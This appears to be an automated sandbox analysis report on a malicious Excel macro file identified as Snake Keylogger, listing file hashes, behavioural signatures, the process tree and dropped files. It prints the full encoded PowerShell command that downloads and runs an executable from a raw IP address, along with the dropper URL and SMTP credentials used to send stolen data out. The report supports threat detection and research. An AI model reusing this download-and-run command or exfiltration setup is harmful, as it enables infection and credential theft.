Overview

overview

10

Static

static

8

70016103621110.xlsm

windows7_x64

10

70016103621110.xlsm

windows10_x64

10

Analysis

  • max time kernel
    120s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-en-20211014
  • submitted
    19-10-2021 11:56

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    70016103621110.xlsm

  • Size

    363KB

  • MD5

    998da072875302919b2819e018eacf6f

  • SHA1

    4bcb248983c0a37842cfae2bb13dcd1e6bc98c87

  • SHA256

    8aa3e1396cd5802e840d87a5a0b370e28102cbe41669124981aa3d38738099a7

  • SHA512

    3192effb38fe5eee4498713e4021836700067a659a869ece23ade0881fcf454c86dd5c559fa7dd1c2e5a8628a108083ac78a9a08e1b876e8f895a6bd9f5734a0

Score
10/10
snakekeyloggercollectionkeyloggerspywarestealer

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://3.64.251.139/v3/2/70016103621110.exe

Extracted

Family

snakekeylogger

Credentials

  • Protocol:     smtp
  • Host:
    efinancet.shop
  • Port:
    587
  • Username:
    [email protected]
  • Password:
    BG##kz5dHzND

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Snake Keylogger

    Keylogger and Infostealer first seen in November 2020.

    stealerkeyloggersnakekeylogger
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • Deletes itself 1 IoCs
  • Loads dropped DLL 3 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

    spywarestealer
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • NTFS ADS 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\70016103621110.xlsm
    1⤵
    • Deletes itself
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • NTFS ADS
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious behavior: RenamesItself
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1336
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c Cxgttzrzhsqtcnpjymlueb.bat
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:908
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -win 1 -enc JABQAHIAbwBjAE4AYQBtAGUAIAA9ACAAIgBDAGUAYwBxAGkAbABiAHQAYwB5AGkAZABpAGIAbQBwAHIAawB5AHAAZABnAGgALgBlAHgAZQAiADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACIAaAB0AHQAcAA6AC8ALwAzAC4ANgA0AC4AMgA1ADEALgAxADMAOQAvAHYAMwAvADIALwA3ADAAMAAxADYAMQAwADMANgAyADEAMQAxADAALgBlAHgAZQAiACwAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcACQAUAByAG8AYwBOAGEAbQBlACIAKQA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAoACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkA
        3⤵
        • Blocklisted process makes network request
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1360
        • C:\Users\Admin\AppData\Roaming\Cecqilbtcyidibmprkypdgh.exe
          "C:\Users\Admin\AppData\Roaming\Cecqilbtcyidibmprkypdgh.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1560
          • C:\Users\Admin\AppData\Local\Temp\Cecqilbtcyidibmprkypdgh.exe
            C:\Users\Admin\AppData\Local\Temp\Cecqilbtcyidibmprkypdgh.exe
            5⤵
            • Executes dropped EXE
            PID:880
          • C:\Users\Admin\AppData\Local\Temp\Cecqilbtcyidibmprkypdgh.exe
            C:\Users\Admin\AppData\Local\Temp\Cecqilbtcyidibmprkypdgh.exe
            5⤵
            • Executes dropped EXE
            • Accesses Microsoft Outlook profiles
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • outlook_office_path
            • outlook_win_path
            PID:1236

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Cecqilbtcyidibmprkypdgh.exe
    MD5

    5139e24e3fa4d06a143dd7d297a44ee7

    SHA1

    2ee7f89720c68680db7e0b96b30069ed1bed913a

    SHA256

    f5a980b01f25dea8e566dff4cc9750bdd5ea67e76c6d02fe490d7366039c9f92

    SHA512

    89358f28afa42de62c7519d6427d71481a9acafba58e665ea199e0f41fe4fa507028d316070b9317d74005b408f2e965261347755854ec7d1a1607606af445b6

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\Cecqilbtcyidibmprkypdgh.exe
    MD5

    5139e24e3fa4d06a143dd7d297a44ee7

    SHA1

    2ee7f89720c68680db7e0b96b30069ed1bed913a

    SHA256

    f5a980b01f25dea8e566dff4cc9750bdd5ea67e76c6d02fe490d7366039c9f92

    SHA512

    89358f28afa42de62c7519d6427d71481a9acafba58e665ea199e0f41fe4fa507028d316070b9317d74005b408f2e965261347755854ec7d1a1607606af445b6

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\Cecqilbtcyidibmprkypdgh.exe
    MD5

    5139e24e3fa4d06a143dd7d297a44ee7

    SHA1

    2ee7f89720c68680db7e0b96b30069ed1bed913a

    SHA256

    f5a980b01f25dea8e566dff4cc9750bdd5ea67e76c6d02fe490d7366039c9f92

    SHA512

    89358f28afa42de62c7519d6427d71481a9acafba58e665ea199e0f41fe4fa507028d316070b9317d74005b408f2e965261347755854ec7d1a1607606af445b6

    Download Submit
  • C:\Users\Admin\AppData\Roaming\Cecqilbtcyidibmprkypdgh.exe
    MD5

    5139e24e3fa4d06a143dd7d297a44ee7

    SHA1

    2ee7f89720c68680db7e0b96b30069ed1bed913a

    SHA256

    f5a980b01f25dea8e566dff4cc9750bdd5ea67e76c6d02fe490d7366039c9f92

    SHA512

    89358f28afa42de62c7519d6427d71481a9acafba58e665ea199e0f41fe4fa507028d316070b9317d74005b408f2e965261347755854ec7d1a1607606af445b6

    Download Submit
  • C:\Users\Admin\AppData\Roaming\Cecqilbtcyidibmprkypdgh.exe
    MD5

    5139e24e3fa4d06a143dd7d297a44ee7

    SHA1

    2ee7f89720c68680db7e0b96b30069ed1bed913a

    SHA256

    f5a980b01f25dea8e566dff4cc9750bdd5ea67e76c6d02fe490d7366039c9f92

    SHA512

    89358f28afa42de62c7519d6427d71481a9acafba58e665ea199e0f41fe4fa507028d316070b9317d74005b408f2e965261347755854ec7d1a1607606af445b6

    Download Submit
  • C:\Users\Admin\Documents\Cxgttzrzhsqtcnpjymlueb.bat
    MD5

    a25144dfbd35573da483d1202359f686

    SHA1

    bb400186ddff1e3b12b3518ab8359038d497b480

    SHA256

    871064b521eab757c7527063778ad9eeb80a3d7f6c6e0c82ec9185f70fa56775

    SHA512

    69a1f4fa24ac223c19d3b478f81104dbfaccf7aeb5fa24c61f44605ad919f975b802dc305ca497846e28e97f965731202e592d1259d77f155dc85bb0990abc83

    Download Submit
  • \Users\Admin\AppData\Local\Temp\Cecqilbtcyidibmprkypdgh.exe
    MD5

    5139e24e3fa4d06a143dd7d297a44ee7

    SHA1

    2ee7f89720c68680db7e0b96b30069ed1bed913a

    SHA256

    f5a980b01f25dea8e566dff4cc9750bdd5ea67e76c6d02fe490d7366039c9f92

    SHA512

    89358f28afa42de62c7519d6427d71481a9acafba58e665ea199e0f41fe4fa507028d316070b9317d74005b408f2e965261347755854ec7d1a1607606af445b6

    Download Submit
  • \Users\Admin\AppData\Local\Temp\Cecqilbtcyidibmprkypdgh.exe
    MD5

    5139e24e3fa4d06a143dd7d297a44ee7

    SHA1

    2ee7f89720c68680db7e0b96b30069ed1bed913a

    SHA256

    f5a980b01f25dea8e566dff4cc9750bdd5ea67e76c6d02fe490d7366039c9f92

    SHA512

    89358f28afa42de62c7519d6427d71481a9acafba58e665ea199e0f41fe4fa507028d316070b9317d74005b408f2e965261347755854ec7d1a1607606af445b6

    Download Submit
  • \Users\Admin\AppData\Roaming\Cecqilbtcyidibmprkypdgh.exe
    MD5

    5139e24e3fa4d06a143dd7d297a44ee7

    SHA1

    2ee7f89720c68680db7e0b96b30069ed1bed913a

    SHA256

    f5a980b01f25dea8e566dff4cc9750bdd5ea67e76c6d02fe490d7366039c9f92

    SHA512

    89358f28afa42de62c7519d6427d71481a9acafba58e665ea199e0f41fe4fa507028d316070b9317d74005b408f2e965261347755854ec7d1a1607606af445b6

    Download Submit
  • memory/908-57-0x0000000000000000-mapping.dmp
    Download
  • memory/1236-79-0x0000000000400000-0x0000000000426000-memory.dmp
    Filesize

    152KB

    Download
  • memory/1236-83-0x0000000000400000-0x0000000000426000-memory.dmp
    Filesize

    152KB

    Download
  • memory/1236-85-0x00000000041A0000-0x00000000041A1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1236-80-0x000000000042040E-mapping.dmp
    Download
  • memory/1236-77-0x0000000000400000-0x0000000000426000-memory.dmp
    Filesize

    152KB

    Download
  • memory/1236-75-0x0000000000400000-0x0000000000426000-memory.dmp
    Filesize

    152KB

    Download
  • memory/1236-76-0x0000000000400000-0x0000000000426000-memory.dmp
    Filesize

    152KB

    Download
  • memory/1236-78-0x0000000000400000-0x0000000000426000-memory.dmp
    Filesize

    152KB

    Download
  • memory/1336-54-0x000000002FE51000-0x000000002FE54000-memory.dmp
    Filesize

    12KB

    Download
  • memory/1336-86-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

    Download
  • memory/1336-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

    Download
  • memory/1336-55-0x0000000071C31000-0x0000000071C33000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1360-61-0x00000000025D0000-0x000000000321A000-memory.dmp
    Filesize

    12.3MB

    Download
  • memory/1360-60-0x0000000075B71000-0x0000000075B73000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1360-59-0x0000000000000000-mapping.dmp
    Download
  • memory/1560-71-0x0000000000580000-0x0000000000598000-memory.dmp
    Filesize

    96KB

    Download
  • memory/1560-70-0x0000000005CF0000-0x0000000005DED000-memory.dmp
    Filesize

    1012KB

    Download
  • memory/1560-68-0x00000000048F0000-0x00000000048F1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1560-66-0x0000000000290000-0x0000000000291000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1560-63-0x0000000000000000-mapping.dmp
    Download